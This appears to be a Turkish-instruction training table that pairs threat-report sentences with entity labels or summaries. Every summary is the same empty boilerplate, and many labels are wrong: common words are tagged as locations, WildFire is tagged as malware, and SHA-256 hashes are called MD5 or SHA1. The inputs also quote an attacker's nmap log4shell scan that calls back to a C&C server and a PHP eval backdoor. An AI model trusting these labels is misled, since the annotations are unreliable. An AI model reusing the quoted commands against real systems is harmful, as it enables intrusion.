instruction stringclasses 2 values | input stringlengths 3 5.01k | output stringlengths 10 5.79k |
|---|---|---|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We discovered a new campaign targeting organizations in Turkey, Pakistan and Tajikistan that has some similarities with an earlier campaign named MuddyWater, which hit various industries in several countries, primarily in the Middle East and Central Asia. | location: campaign; location: and; location: campaign; identity: hit; location: and |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In May 2020, we discovered that APT35 attempted to upload spyware to the Google Play Store. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 9. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | As always, we are monitoring the situation closely and will provide additional details as they become available. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Svchost injection is not new — in fact, Trickbot and other malware variants use this technique. | tools: Trickbot; location: and |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | As of this writing, no proofs of concept for exploitation of CVE-22972 or CVE-2022-22973 are known. | vulnerability: CVE-2022-22973; vulnerability: CVE-22972 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | In later versions it was obfuscated with Base64. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Typically, these websites would require its users to download the applications directly onto their devices. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | In our updated report on ransomware from Unit 42, “Ransomware: Unlocking the Lucrative Criminal Business Model,” Unit 42 researcher Bryan Lee notes: “In 2016, it was thought that there were less than one hundred active ransomware variants out in the wild. | identity: Unit 42; TIME: 2016; identity: Unit 42; identity: Bryan Lee |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The Confucius Link | threat-actor: Confucius |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | A successful attack would run code in the security context that Struts is using. | SOFTWARE: Struts |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | However, it was easily subverted to work against the malware. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Cassandra Protector: CyaX | tools: Cassandra; tools: CyaX |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Sphinx reportedly uses the watering hole technique via social media sites to deliver its payloads — mainly a customized version of njRAT. | campaign: Sphinx; malware: njRAT |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | But it’s effective enough that when used in several hundred different spam campaigns every month it pays for the criminals to keep up these attacks against targets around the world. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The second encoded PowerShell script, which is executed after the first script is decoded This will then result in more readable PowerShell scripts capable of dropping various components in the %Application Data%\Microsoft\CLR\* directory. | attack-pattern: PowerShell; location: will; attack-pattern: PowerShell |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | This leads us back to the Confucius and Patchwork link. | threat-actor: Patchwork; threat-actor: Confucius |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | On the other end are places like some large banking and R&D companies that can manage about 98 or 99%. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Shortly after this advisory was released, Microsoft issued an out-of-band patch to protect affected users from CVE-2020-0796. | vulnerability: CVE-2020-0796; identity: Microsoft |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | They used the command nmap --script log4shell.nse --script-args log4shell.waf-bypass=true --script-args log4shell.callback-server=xx.xx.xx.xx:1389 -p 80,443 xx.xx.xx.xx/xx, and set the callback server to the attacker group C&C server. Figure 23. | tools: nmap |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We use our research to continuously improve the safety and security of our products and share this intelligence with the community to benefit the internet as a whole. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Google detected the app quickly and removed it from the Play Store before any users had a chance to install it. | identity: Google; SOFTWARE: Play Store |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Information on Supernova added Update on 1/22/2021 4:56 PM PST: | TIME: 4:56 PM PST |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Since we detected the first CryptoWall 2.0 variant with our WildFire engine on September 29, we’ve seen over 85,000 separate attacks attempting to deliver the malware. | malware: WildFire; TIME: September 29; malware: CryptoWall 2.0 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Recently observed Ghostwriter credential phishing domains and emails: Curious Gorge, a group TAG attributes to China's PLA SSF, has remained active against government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. | threat-actor: Ghostwriter; attack-pattern: phishing; location: and; location: and; location: and |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This post is also available in: 日本語 (Japanese) Over the past six months, we’ve seen a major increase in the number of attack campaigns with the ultimate goal of mining cryptocurrency. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Related IOCs | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We would also like to thank Project Zero for their technical assistance in helping analyze these bugs. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | On the left, the weaponized document. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC. | malware: ALIEN; location: and |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | To determine how this vulnerability was exploited, we analyzed the patch that developers added to OctoberCMS version 1.0.472 to mitigate the CVE-2021-32648 vulnerability. | vulnerability: CVE-2021-32648; SOFTWARE: OctoberCMS |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | A script file is also used to download or install ransomware. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Anyone who’s been paying attention to cybercrime since 2013 is aware of the ransomware surge, infecting systems throughout the world and plaguing networks’ administrators. | TIME: 2013 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We continue to see attacks from groups like Charming Kitten on medical and healthcare professionals, including World Health Organization (WHO) employees. | threat-actor: Charming Kitten; identity: World Health Organization (WHO) |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Execution | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | On any given day, TAG is tracking more than 270 targeted or government-backed attacker groups from more than 50 countries. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Launching the auxiliary tool via the scheduled task Scheduled tasks are usually associated with persistence or privilege escalation, which is not the case in this incident. | location: tool; attack-pattern: scheduled task; location: are; attack-pattern: privilege escalation; location: case |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Only the first of the examples had the mutex associated with a vast majority of malware samples. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Preferably, find a password manager that requires two-factor authentication. 2. Protect Your Home Routers and Wi-Fi: | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | All consumer and business antivirus versions of Avast and AVG detect and block this AvosLocker ransomware variant, so our users are protected from this attack vector. | SOFTWARE: Avast; SOFTWARE: AVG; malware: AvosLocker |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The mtd_data_t structure The data is read to this structure. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Government-backed or state-sponsored groups have different goals in carrying out their attacks: Some are looking to collect intelligence or steal intellectual property; others are targeting dissidents or activists, or attempting to engage in coordinated influence operations and disinformation campaigns. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Financially motivated and criminal actors are also using current events as a means for targeting users. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | So far, Palo Alto Networks is only seeing indications of testing within our customer telemetry indicated by final payload execution of benign executables such as calc.exe and notepad.exe. | identity: Palo Alto Networks; FILEPATH: notepad.exe; FILEPATH: calc.exe |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Although it cannot be used as proof of attribution, the preceding code reminded us of a routine from the third-stage code of VPNFilter’s process called “dstr” that was intended to “brick” the infected device. | malware: VPNFilter |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Table 2. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Note that the KurdishCoder indicator was spotted also by the Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA), which they reported as a single incident. | identity: Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA) |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | m_pixel_ratio) | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The App Indicates Two Threats were Found If the user clicks the “Repair” button, the apps will indicate that one of the threats was eliminated and advise the user to upgrade to its full version to remove the remaining threat(s). | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Revix | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | After a host is infected, there is no communication from the malware back to the attacker. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | We use email authentication to protect against email spoofing, which is when email content is changed to make the message appear from someone or somewhere other than the actual source. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | NOTE: On May 20th, we updated our attribution to more precisely describe our findings. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Whether they are work documents, e-receipts, or a lease on a new apartment – Office documents are useful to all of us, and this is part of the reason we’re very likely to open an office document we receive as an attachment in e-mail. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The highlighted portions in Figure 8 show the backdoor’s version number and timestamp with the “with encrypt” strings. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Ransom notes from Makop, Dharma, Ryuk, DearCry and others, sometimes ask victims to reach out to them via email. | malware: Makop; malware: Ryuk; malware: DearCry; malware: Dharma |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links. | SOFTWARE: Google Drive |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | For example, an action for the SYSTEM_ADMIN could be to create a user, add a user to a channel, etc. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | theme0.xml is a Mach-O 32-bit executable with a 0xFEEDFACE signature that is also the dropper of the backdoor, which is the final payload. | location: Mach; identity: bit |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The attackers are doing this by using URL shorteners to make XMRig look like other, legitimate, and expected programs. | tools: XMRig |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | First, the $IDFX variable uses XOR operation (see character ^) to decode the string “create_function”, then the resulting base64 string is decoded to @eval($_REQUEST['ec_ver2update']); which is the backdoor’s code. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | There’s a lot out there already about what Heartbleed means for the Web and beyond, and I’ll point you to our own analysis written by Scott Simkin or an essay by Dan Goodin over at ars technica for that explanation. | identity: Scott Simkin; identity: Dan Goodin; identity: ars technica; vulnerability: Heartbleed |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Indicators of Compromise Indicator Description Detection mail2000tw[.]com Domain operated by Earth Wendigo bf[.]mail2000tw[.]com Domain operated by Earth Wendigo admin[.]mail2000tw[.]com Domain operated by Earth Wendigo googletwtw[.]com Domain operated by Earth Wendigo bf[.]googletwtw[.]com Domain operated by Earth Wendigo ws[.]googletwtw[.]com Domain operated by Earth Wendigo admin[.]googletwtw[.]com Domain operated by Earth Wendigo anybodyopenfind[.]com Domain operated by Earth Wendigo support[.]anybodyopenfind[.]com Domain operated by Earth Wendigo supports[.]anybodyopenfind[.]com Domain operated by Earth Wendigo supportss[.]anybodyopenfind[.]com Domain operated by Earth Wendigo a61e84ac9b9d3009415c7982887dd7834ba2e7c8ea9098f33280d82b9a81f923 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 66cf12bb9b013c30f9db6484caa5d5d0a94683887cded2758886aae1cb5c1c65 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 4cdaca6b01f52092a1dd30fc68ee8f6d679ea6f7a21974e4a3eb8d14be6f5d74 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A f50a589f3b3ebcc326bab55d1ef271dcec372c25d65f381a409ea85929a34b49 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A e047aa878f9e7a55a80cc1b70d0ac9840251691e91ab6454562afbff427b0879 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A a1a6dc2a6c795fc315085d00aa7fdabd1f043b28c68d4f98d4152fe539f026f1 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 10d2158828b953ff1140376ceb79182486525fd14b98f743dafa317110c1b289 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 0e04a03afa5b66014457136fb4d437d51da9067dc88452f9ebd098d10c97c5b8 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 75f3f724a2bfda1e74e0de36ff6a12d3f2ea599a594845d7e6bc7c76429e0fa4 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A c3bc364409bb0c4453f6d80351477ff8a13a1acdc5735a9dff4ea4b3f5ad201c Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 5251087bb2a0c87ac60c13f2edb7c39fb1ea26984fcc07e4cf8b39db31ce2b08 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 7fa9a58163dd233065a86f9ed6857ed698fc6e454e6b428ea93f4f711279fb61 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A f568f823959be80a707e05791718c1c3c377da1b0db1865821c1cf7bc53b6084 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A a54d58d5a5812abaede3e2012ae757d378fb51c7d3974eaa3a3f34511161c1db Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A 77c3d62cce21c2c348f825948042f7d36999e3be80db32ac98950e88db4140b1 Earth Wendigo XSS attack script Trojan.JS.WENDIGOE.A c0dabb52c73173ea0b597ae4ad90d67c23c85110b06aa3c9e110a852ebe04420 Earth Wendigo Service Worker script Trojan.JS.WENDIGOE.A efe541889f3da7672398d7ad00b8243e94d13cc3254ed59cd547ad172c1aa4be Earth Wendigo WebSocket JavaScript backdoor Backdoor.JS.WENDIGOE.A 2411b7b9ada83f6586278e0ad36b42a98513c9047a272a5dcb4a2754ba8e6f1d Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.A 1de54855b15fc55b4a865723224119029e51b381a11fda5d05159c74f50cb7de Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.A d935c9fe8e229f1dabcc0ceb02a9ce7130ae313dd18de0b1aca69741321a7d1b Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.B 50f23b6f4dff77ce4101242ebc3f12ea40156a409a7417ecf6564af344747b76 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C fab0c4e0992afe35c5e99bf9286db94313ffedc77d138e96af940423b2ca1cf2 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C 4d9c63127befad0b65078ccd821a9cd6c1dccec3e204a253751e7213a2d39e39 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C 25258044c838c6fc14a447573a4a94662170a7b83f08a8d76f96fbbec3ab08e2 Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C 13952e13d310fb5102fd4a90e4eafe6291bc97e09eba50fedbc2f8900c80165f Earth Wendigo Shellcode Loader Trojan.Win32.WENDIGOE.C ccb7be5a5a73104106c669d7c58b13a55eb9db3b3b5a6d3097ac8b68f2555d39 Earth Wendigo Shellcode Loader Trojan.Win64.WENDIGOE.A 40a251184bb680edadfa9778a37135227e4191163882ccf170835e0658b1e0ed Earth Wendigo Shellcode Loader Trojan.Win64.WENDIGOE.B 0d6c3cc46be2c2c951c24c695558be1e2338635176fa34e8b36b3e751ccdb0de Cobalt Strike Trojan.Win32.COBALT.SM Tags Articles, News, Reports | APT & Targeted Attacks | Research | threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; threat-actor: Earth Wendigo; SHA1: a61e84ac9b9d3009415c7982887dd7834ba2e7c8ea9098f33280d82b9a81f923; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA1: 66cf12bb9b013c30f9db6484caa5d5d0a94683887cded2758886aae1cb5c1c65; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA1: 4cdaca6b01f52092a1dd30fc68ee8f6d679ea6f7a21974e4a3eb8d14be6f5d74; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: f50a589f3b3ebcc326bab55d1ef271dcec372c25d65f381a409ea85929a34b49; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: e047aa878f9e7a55a80cc1b70d0ac9840251691e91ab6454562afbff427b0879; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: a1a6dc2a6c795fc315085d00aa7fdabd1f043b28c68d4f98d4152fe539f026f1; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: 10d2158828b953ff1140376ceb79182486525fd14b98f743dafa317110c1b289; threat-actor: Earth Wendigo; attack-pattern: XSS; MD5: 0e04a03afa5b66014457136fb4d437d51da9067dc88452f9ebd098d10c97c5b8; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: 75f3f724a2bfda1e74e0de36ff6a12d3f2ea599a594845d7e6bc7c76429e0fa4; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: c3bc364409bb0c4453f6d80351477ff8a13a1acdc5735a9dff4ea4b3f5ad201c; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: 5251087bb2a0c87ac60c13f2edb7c39fb1ea26984fcc07e4cf8b39db31ce2b08; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: 7fa9a58163dd233065a86f9ed6857ed698fc6e454e6b428ea93f4f711279fb61; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA1: f568f823959be80a707e05791718c1c3c377da1b0db1865821c1cf7bc53b6084; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA1: a54d58d5a5812abaede3e2012ae757d378fb51c7d3974eaa3a3f34511161c1db; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA1: 77c3d62cce21c2c348f825948042f7d36999e3be80db32ac98950e88db4140b1; threat-actor: Earth Wendigo; attack-pattern: XSS; SHA2: c0dabb52c73173ea0b597ae4ad90d67c23c85110b06aa3c9e110a852ebe04420; threat-actor: Earth Wendigo; SHA2: efe541889f3da7672398d7ad00b8243e94d13cc3254ed59cd547ad172c1aa4be; threat-actor: Earth Wendigo; SHA1: 2411b7b9ada83f6586278e0ad36b42a98513c9047a272a5dcb4a2754ba8e6f1d; threat-actor: Earth Wendigo; SHA1: 1de54855b15fc55b4a865723224119029e51b381a11fda5d05159c74f50cb7de; threat-actor: Earth Wendigo; SHA2: d935c9fe8e229f1dabcc0ceb02a9ce7130ae313dd18de0b1aca69741321a7d1b; threat-actor: Earth Wendigo; SHA1: 50f23b6f4dff77ce4101242ebc3f12ea40156a409a7417ecf6564af344747b76; threat-actor: Earth Wendigo; SHA1: fab0c4e0992afe35c5e99bf9286db94313ffedc77d138e96af940423b2ca1cf2; threat-actor: Earth Wendigo; SHA2: 4d9c63127befad0b65078ccd821a9cd6c1dccec3e204a253751e7213a2d39e39; threat-actor: Earth Wendigo; SHA1: 25258044c838c6fc14a447573a4a94662170a7b83f08a8d76f96fbbec3ab08e2; threat-actor: Earth Wendigo; SHA1: 13952e13d310fb5102fd4a90e4eafe6291bc97e09eba50fedbc2f8900c80165f; threat-actor: Earth Wendigo; SHA2: ccb7be5a5a73104106c669d7c58b13a55eb9db3b3b5a6d3097ac8b68f2555d39; threat-actor: Earth Wendigo; SHA1: 40a251184bb680edadfa9778a37135227e4191163882ccf170835e0658b1e0ed; threat-actor: Earth Wendigo; SHA1: 0d6c3cc46be2c2c951c24c695558be1e2338635176fa34e8b36b3e751ccdb0de; tools: Cobalt Strike; location: APT |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | We found a cybersquatting domain – save-russia[.]today – that is launching DoS attacks on Ukrainian news sites. | attack-pattern: cybersquatting; DOMAIN: save-russia[.]today; attack-pattern: DoS attacks; identity: Ukrainian news sites |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Tags Cloud | APT & Targeted Attacks | Cyber Crime | Expert Perspective | Cyber Threats | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Lapsus$, however, is unusual in its approach – for this group, notoriety most often appears to be the goal, rather than financial gain. | threat-actor: Lapsus$ |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | The heap block will not be occupied by user-controlled data after the critical objects are freed. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Figure 17. Snippet of Script in HTML Source Code xn--90a5ai[.]comFrom the list of aliases used by the threat actor | DOMAIN: xn--90a5ai[.]com |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Our paper, “A Security Analysis of the Data Distribution Service (DDS) Protocol,” includes short- and long-term mitigation best practices and recommendations, as well as a consideration for adopting a shift-left approach. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | STRINGDATA::RESOURCE_ID | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | There was code to download a file from a C2 but we did not come across any URL strings in the Mach-O so we checked the javascript and saw there were two arguments passed when the binary is run–the url for the payload and its size | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | The spyware connects to 107[.]180[.]46[.]243. | IPV4: 107[.]180[.]46[.]243 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | To date, Shamoon 2 has unfolded in three separate attack waves on November 11, 2016, November 29, 2016, and January 23, 2017. | TIME: To date; threat-actor: Shamoon 2; TIME: November 11, 2016; TIME: November 29, 2016; TIME: January 23, 2017 |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | While we have been following cyberespionage group TICK (a.k.a. “BRONZE BUTLER” or “REDBALDKNIGHT”) since 2008, we noticed an unusual increase in malware development and deployments towards November 2018. | threat-actor: BRONZE BUTLER; threat-actor: REDBALDKNIGHT; location: and |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Beer was able to quickly recognize this exploit as a variant of an earlier port type confusion vulnerability he analyzed in the XNU kernel (CVE-2020-27932). | SOFTWARE: XNU kernel; vulnerability: CVE-2020-27932 |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Most notably, their focus to date does not appear to have been on extortion and financial gain. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | That report also mentioned InPage software targeting and Delphi backdoors. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | All organizations running vulnerable versions of Apache Struts should deploy the security updates as soon as possible. | SOFTWARE: Apache Struts |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This would certainly be good news to anyone reading this blog, but for the criminal it’s a big setback and source of frustration. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Read on for more details. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | Earlier in May, Ireland's Health Service Executive (HSE) was also hit by a ransomware attack, which continues to result in major issues. | identity: hit; location: major |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | One of the group’s more notable campaigns involved attacks that targeted the private email addresses of government officials and politicians in an Eastern European country in September 2021. | TIME: September 2021; location: Eastern European |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | However, it is possible that multiple groups might be covertly sharing the source code for this malware. | attack-pattern: source |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Among other targets, this spyware was used to compromise journalists and opposition politicians. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | But, mobile banking use is picking up around the globe. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Opens command shell 0x5007 Unknown 0x5009 Closes command shell 0x500A | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | They encapsulate this method and apply it to almost every object in mshtml.dll. | FILEPATH: mshtml.dll |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 6. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | I’d like to highlight an area where we are seeing increased activity: attacks against cloud infrastructures. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | There is a Cortex XSOAR pack available to assist with detecting and mitigating both threats. | SOFTWARE: Cortex XSOAR |
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin. | During our investigation into Earth Centaurs activities, we found that it also uses another backdoor called Lilith RAT. | threat-actor: Earth Centaurs; malware: Lilith RAT |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Character “{” = 0x7B =123. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | This script collected all available client information such as the user-agent, resolution, etc. and then sent it back to the exploitation server. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | Figure 4: | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
Aşağıdaki metni analiz edin ve özet bir açıklama yapın. | By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. | Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır. |
